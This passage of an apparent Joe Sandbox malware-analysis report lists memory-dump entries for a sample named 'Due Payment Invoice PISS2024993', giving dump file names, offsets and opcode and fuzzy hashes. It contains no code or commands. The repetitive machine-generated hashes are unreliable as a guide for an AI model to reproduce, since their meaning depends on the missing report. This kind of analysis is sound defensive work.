                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                                                              • Instruction ID: f938b645f361fc2516fd67fe6fe520e879e1d76cdaec5cd319e6e4022e539167
                                                                                              • Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                                                              • Instruction Fuzzy Hash: 3E21AF76904240DFDB06CF54D9C4B16BF72FB88324F24C5AADD090B666C33AD42ACBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                                              • Instruction ID: 6b98cd6480491c9d7c86f6169765aa331e9c5710ffb93b93c408ce1a4a13ae76
                                                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                                              • Instruction Fuzzy Hash: C011B176904280CFDB16CF54D9C4B16BF71FB88324F24C6AAD9490B666C33AD45ACBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39320e139efb172123cc29e1a395ca6ab76f30626181e22aeb8e79712c354064
                                                                                              • Instruction ID: 4511dc3a13c8873eb54af722d0adfb588a090524551d562cfceb4fc37875f154
                                                                                              • Opcode Fuzzy Hash: 39320e139efb172123cc29e1a395ca6ab76f30626181e22aeb8e79712c354064
                                                                                              • Instruction Fuzzy Hash: 451190306047448FC712DF3DC061695BBB1EF86340F0586AED886CB262EB75E985CBC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 313aa1b58531af952ed775a24a8b208a3b7de033e670201de335587e72e99670
                                                                                              • Instruction ID: 7c3473b71a67d5ecb7ac8bed11e739d49b8e759dcc7c23940b710ee1ab1de48c
                                                                                              • Opcode Fuzzy Hash: 313aa1b58531af952ed775a24a8b208a3b7de033e670201de335587e72e99670
                                                                                              • Instruction Fuzzy Hash: D821D3B59002499FDB10DF9AD884ADEBBF8FB48320F10851AE919A7210D375A944CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5072c2269aff56aa4a1338220078f7f6491b56f12eecae44b72e9200bd630a4c
                                                                                              • Instruction ID: f5cfd57b57a20be73621d1887dbc8961d89c3e30084d4989f132c7e8ff581bde
                                                                                              • Opcode Fuzzy Hash: 5072c2269aff56aa4a1338220078f7f6491b56f12eecae44b72e9200bd630a4c
                                                                                              • Instruction Fuzzy Hash: EC116A32900B5186EB009F5DD854281B361FF95324F198A7ACC4C3F342EBB1798487A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 55d87e5e89f9e19996a09e9d0933c1e5ff18bef9cca52c8bb6e5ff3234f1024a
                                                                                              • Instruction ID: 24430b3bc0bf8069316927e2fa98bb4630d498325c3e3986e350cf44ad5a0798
                                                                                              • Opcode Fuzzy Hash: 55d87e5e89f9e19996a09e9d0933c1e5ff18bef9cca52c8bb6e5ff3234f1024a
                                                                                              • Instruction Fuzzy Hash: 6A119430A01209DBD714EFA9D11979E77F2EF88311F20442DD906A7394CB755D45CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                                              • Instruction ID: 2b3d6ef0b70cd7ee1946432f0273774ec30a7bc9058c7efe719093831cb9c17f
                                                                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                                              • Instruction Fuzzy Hash: 95118B75904280DFEB16CF54D5C4B16BBA1FB84324F24C6AED8494B7A6C33AD44ACB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f4f42a2ab2e66e7d08e365a16ab009a6dd23837275d85f515692c7102d8474d
                                                                                              • Instruction ID: 222df7f18516beedf52629eaf916eaa464c19d7f88125c11d2c0183e1f3556b6
                                                                                              • Opcode Fuzzy Hash: 1f4f42a2ab2e66e7d08e365a16ab009a6dd23837275d85f515692c7102d8474d
                                                                                              • Instruction Fuzzy Hash: 92112930601209DBCB14EB75E02D7AE7BF1EF89300F10482CD4429A285CB786C01CBE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86625e23ce112caf8ca355cc26c818376a188e03a16df988472a41971dde1931
                                                                                              • Instruction ID: 2ff07b963312a2ff43562a31b607cd3355c474909911677d7aa8803befaffdee
                                                                                              • Opcode Fuzzy Hash: 86625e23ce112caf8ca355cc26c818376a188e03a16df988472a41971dde1931
                                                                                              • Instruction Fuzzy Hash: 3311E9316087898FCB12AB7888165997F74EF82210F0942EEDD85DF252EB38E945C7D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6428ed4850b7d7106692116785c3b96b3ad40e75a01881100272ffc0b335e812
                                                                                              • Instruction ID: 4445f9849e75c351159314d17697f3dd0c527b5953b28a8b59a5acfcd6bf5008
                                                                                              • Opcode Fuzzy Hash: 6428ed4850b7d7106692116785c3b96b3ad40e75a01881100272ffc0b335e812
                                                                                              • Instruction Fuzzy Hash: 0A11F3B5D042498FCB10DFAAD848ADEFBF4EB49320F14841AE969A7310D774A944CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f95457874fe4eade93447444aacc8a22de5b06a9092feffaa44ffa08b880fb1
                                                                                              • Instruction ID: 1594c1af13b05aaf87ee4b57ac574f219c0f245be70bcd046c5a40b4b36d6137
                                                                                              • Opcode Fuzzy Hash: 2f95457874fe4eade93447444aacc8a22de5b06a9092feffaa44ffa08b880fb1
                                                                                              • Instruction Fuzzy Hash: 0111E532A047458BCB11EF3DD420096B7B1EFD22507158AAADC89DB211FB31EA81C7D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a28d02cf371670c06ab7df17ab104b2d1452f8a42f387dabd49b6315857ab70a
                                                                                              • Instruction ID: 5eb326dcdbbde7dff65acf974d4e33e75a26340ed1fcb31c356a20780dbe3d03
                                                                                              • Opcode Fuzzy Hash: a28d02cf371670c06ab7df17ab104b2d1452f8a42f387dabd49b6315857ab70a
                                                                                              • Instruction Fuzzy Hash: 601116B5D042498FCB10DF9AD449B9EFBF8EB88320F14841AD959A7310D774A944CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c4b59976fc23a59d67fdba904ab64c46fac3c3fe55adfeffde11130a0ffcdf12
                                                                                              • Instruction ID: dc1dc3ea3e2f17b06c85946a931ff014839ca89d3e2cbffca218c11f230c91ad
                                                                                              • Opcode Fuzzy Hash: c4b59976fc23a59d67fdba904ab64c46fac3c3fe55adfeffde11130a0ffcdf12
                                                                                              • Instruction Fuzzy Hash: 7E01D6B170C7545FCB1A9B38E451A697BE9EF8A61035844BBE846CB6A1CA21ED01C7D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 002b91faca14c809ac33fda03e822e8f3d01f5d8538eb3fcf866d729f1c8e2cc
                                                                                              • Instruction ID: 74bc99183364f05728a12472e81ac6f5cd105c52a1cd6f1c30f0905609827fe5
                                                                                              • Opcode Fuzzy Hash: 002b91faca14c809ac33fda03e822e8f3d01f5d8538eb3fcf866d729f1c8e2cc
                                                                                              • Instruction Fuzzy Hash: BF0122724083448FCB02CFA9D844B8ABFF0EF59310F04849AD548DB210D331D808CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72cbd6bd721fd4875b44655dc07f6d98924c0732a4c7d1a1b00464a43fced183
                                                                                              • Instruction ID: 4ee7ed0869349b9e98c79be844a3faf14660f170eae1ab171eb4451ac8925806
                                                                                              • Opcode Fuzzy Hash: 72cbd6bd721fd4875b44655dc07f6d98924c0732a4c7d1a1b00464a43fced183
                                                                                              • Instruction Fuzzy Hash: FC115631D00209DFCB40EFACC54589DBBF4FF45340B11859AD459DB221E7309A55CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 755752e04f1738bbdb3561bea8f156fde541da694f7439b1b6f720282ab84a7b
                                                                                              • Instruction ID: e5d30a8a4e5c34fa074e7906223656167f1d0fdddf75d3a055d5a5fb52b9620d
                                                                                              • Opcode Fuzzy Hash: 755752e04f1738bbdb3561bea8f156fde541da694f7439b1b6f720282ab84a7b
                                                                                              • Instruction Fuzzy Hash: 1801D2301087804FEB129B76E4113953FA2EF96300F0548AAE4D5CF296DBB4594ADB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b09343a8459d4cb7d30b9a8d7ac34d74788b756153f77a06331519af0fd05c68
                                                                                              • Instruction ID: d5456494a62ab2c2ff06c2674e2f6c17ea55d1e2846c3b42cd088852579cbe51
                                                                                              • Opcode Fuzzy Hash: b09343a8459d4cb7d30b9a8d7ac34d74788b756153f77a06331519af0fd05c68
                                                                                              • Instruction Fuzzy Hash: FF0117706007098FC724EF39C45555AB7F6FF85244B11866EE886CB260EB75EA81CBC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3edc32892c5627ef8388965be06936eaa2fb3ae67d4cd11b459bc10772340aed
                                                                                              • Instruction ID: ed45671bc2e32b04e7cccd2e6e6a21024664f90f548cc22efe35c780299da033
                                                                                              • Opcode Fuzzy Hash: 3edc32892c5627ef8388965be06936eaa2fb3ae67d4cd11b459bc10772340aed
                                                                                              • Instruction Fuzzy Hash: FC0124302057408BE722EB6AD0003A67BE6EF91300F40882EE485CB296DFF49949CFD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96d0fbc9ecab3a9e754a471976f51bfb1185fbb1a363843b4c594a4899e33e5c
                                                                                              • Instruction ID: 31f8c5353723f0ad7497bd0f17b085331760267640aed6fb3b5d79bb1a845f7a
                                                                                              • Opcode Fuzzy Hash: 96d0fbc9ecab3a9e754a471976f51bfb1185fbb1a363843b4c594a4899e33e5c
                                                                                              • Instruction Fuzzy Hash: 9AF09671B002145B8F15F7ACDC564BEBBBAEB89510F000428D905EB340EB704E11D7E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b056b4447c9f5be4abdc4b8bc4d324e7455faa93bd203ac46c25a14f87b9d23
                                                                                              • Instruction ID: 49ff1644c8b475472d945af187049b54c4d7cca23ceb406f723f59d12a358167
                                                                                              • Opcode Fuzzy Hash: 8b056b4447c9f5be4abdc4b8bc4d324e7455faa93bd203ac46c25a14f87b9d23
                                                                                              • Instruction Fuzzy Hash: 0DF0E2B030921A8BC724D63E8866A3A33DAEFC0A56705443EED07C3290EE60CF01D7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e240f07abdb6f564fdd0cbec746b64eca9d6c54cc1c255bdd7620911cfd0f746
                                                                                              • Instruction ID: 975e988fa357682b1e5453c76ba77e73fb7a837afe58859411d79a04a6a1bcdb
                                                                                              • Opcode Fuzzy Hash: e240f07abdb6f564fdd0cbec746b64eca9d6c54cc1c255bdd7620911cfd0f746
                                                                                              • Instruction Fuzzy Hash: 6AF0AF753047104BCB1A6A2C942566C3BA6EFC6911B0500BADC06CB3A1EE35CE02C7C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b3cfc6a9f0ee010e66c5a9c5a30c44c5d51d66b0a4f3c06048477fc0f437a94
                                                                                              • Instruction ID: 6c1b49f15f3e5823d1736e5a8945d40b26df1caf6b4e9fcce75f55c8ee047394
                                                                                              • Opcode Fuzzy Hash: 5b3cfc6a9f0ee010e66c5a9c5a30c44c5d51d66b0a4f3c06048477fc0f437a94
                                                                                              • Instruction Fuzzy Hash: 5DF0AF717007088BCB117B7C84054AEB779EFC1610F01466DDD45A7200EF34EA4186D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 658d84e975a108c88fc66d99ec7913e4cefebbc97ecfdc0f605ce3810d479ebf
                                                                                              • Instruction ID: b7f73b58482fd1dc70737911385b50ce1d6555bf57c66e383f78f991815a307c
                                                                                              • Opcode Fuzzy Hash: 658d84e975a108c88fc66d99ec7913e4cefebbc97ecfdc0f605ce3810d479ebf
                                                                                              • Instruction Fuzzy Hash: 33F05476300A154FC7149E6EE88485ABBA9EFD4265300467EE60FC7261DEB1AC498790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6e50373879060769e3210171800f624e18a88dd5694d650170a169dea34b762
                                                                                              • Instruction ID: 9888adde42769e4e4538345afc5c8f3fed19980d94614f22c94bb8ad63a78287
                                                                                              • Opcode Fuzzy Hash: c6e50373879060769e3210171800f624e18a88dd5694d650170a169dea34b762
                                                                                              • Instruction Fuzzy Hash: 90F0B47130D2168FCB349A2994669BA37AAEF84A46709007BED03C72D1DB64DF01D7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eedbeb15ca9318ac67cd6c7bf7bb59db31d2be5b7025ee617ac66489c0a4e397
                                                                                              • Instruction ID: 4ea7c8e1e8efeb8767ce05fac548cb7ea63bc06eed1cd9ddb610049006406a43
                                                                                              • Opcode Fuzzy Hash: eedbeb15ca9318ac67cd6c7bf7bb59db31d2be5b7025ee617ac66489c0a4e397
                                                                                              • Instruction Fuzzy Hash: 39F0BE713002104B8B196A2D942952D329AEFC5911B141039DD06CB390EE31CE0287D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1cecbe5e0f07638bce3b4b2903b1eb866a331d2829ad5ea12093886fad8e96b9
                                                                                              • Instruction ID: 82665136b35bc4d7670d01892dc5b25ba104cdf14e09a124571e4f52ff35cde8
                                                                                              • Opcode Fuzzy Hash: 1cecbe5e0f07638bce3b4b2903b1eb866a331d2829ad5ea12093886fad8e96b9
                                                                                              • Instruction Fuzzy Hash: 9EF0B479304345CFDB069F38E490DA93FA5EF9B35131408EAE1488F235DA35AC05CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9aab6f7f8729dd28cc431c1b8756b428fbaac761c6f00404ed19fa146c13be02
                                                                                              • Instruction ID: fd843b0a9607d08943af03156083451da6b86b91c2379268f4ce76411367e652
                                                                                              • Opcode Fuzzy Hash: 9aab6f7f8729dd28cc431c1b8756b428fbaac761c6f00404ed19fa146c13be02
                                                                                              • Instruction Fuzzy Hash: 6DF014312046908FC706DB38C5988547FF1EF0A70574649DAE08ACB332CB22EC41CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d738c3019cc6cab5762b9461fcf0f577775fbcb76d856021ab577674b4d5b06
                                                                                              • Instruction ID: 57604083272ca2f3740693156edc6d578a60f92938dbf825c874a9eed27b4c7c
                                                                                              • Opcode Fuzzy Hash: 4d738c3019cc6cab5762b9461fcf0f577775fbcb76d856021ab577674b4d5b06
                                                                                              • Instruction Fuzzy Hash: 76F082306292C48FCF069B74F9695583F30EF4A241B0515D6E8828B263DE343946C762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                              • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                              • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                              • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3362447c4e12a16b0504a05ed560486cf8f7de8c844386547935b06d28f09c48
                                                                                              • Instruction ID: dc3221cc21f151a02a29d4bc9b504e976574a587488414fe564cb629f782e9b7
                                                                                              • Opcode Fuzzy Hash: 3362447c4e12a16b0504a05ed560486cf8f7de8c844386547935b06d28f09c48
                                                                                              • Instruction Fuzzy Hash: C2F020317081145FDB05DAA9A410AEA7FE8FB88220F1840AAE90CC3280EF35E805C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3494670afec1253665b65e89c4d87dca8f281aed752d85b2ca2cfe49b2b22586
                                                                                              • Instruction ID: 078953f45b493cfcc02c50291bd97367c68bb41bfb944644235a2d97da073828
                                                                                              • Opcode Fuzzy Hash: 3494670afec1253665b65e89c4d87dca8f281aed752d85b2ca2cfe49b2b22586
                                                                                              • Instruction Fuzzy Hash: 92F02731104744AFCB319B39D8568637FB9EF462503040DAAD88AC7611F620EC06C7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ffd83bd8231f6a0b61ddc56d3fba3c9b96d98c197b256befd96096369bd25a5a
                                                                                              • Instruction ID: f7dc2002d359a18d438af5446689aa3433813c063d74f61fe22f8577cea6aec8
                                                                                              • Opcode Fuzzy Hash: ffd83bd8231f6a0b61ddc56d3fba3c9b96d98c197b256befd96096369bd25a5a
                                                                                              • Instruction Fuzzy Hash: 0AF05271304A428FC71A8B2CE48480D3FA5EFA421130009BEE14BCB2A2DEB0DC888380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ed12e71a46a0d5f1c3ada6776052927df16e4830eb388ebb5e23bef0317ecc2
                                                                                              • Instruction ID: f8823cfe25b38975e162d763ed140857c6d12bed24833d737e012f1e2db5a105
                                                                                              • Opcode Fuzzy Hash: 1ed12e71a46a0d5f1c3ada6776052927df16e4830eb388ebb5e23bef0317ecc2
                                                                                              • Instruction Fuzzy Hash: 0AF037B69002088FCB10CF99D44878EFBF0EF48324F14841ADA19A7210C378A945CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
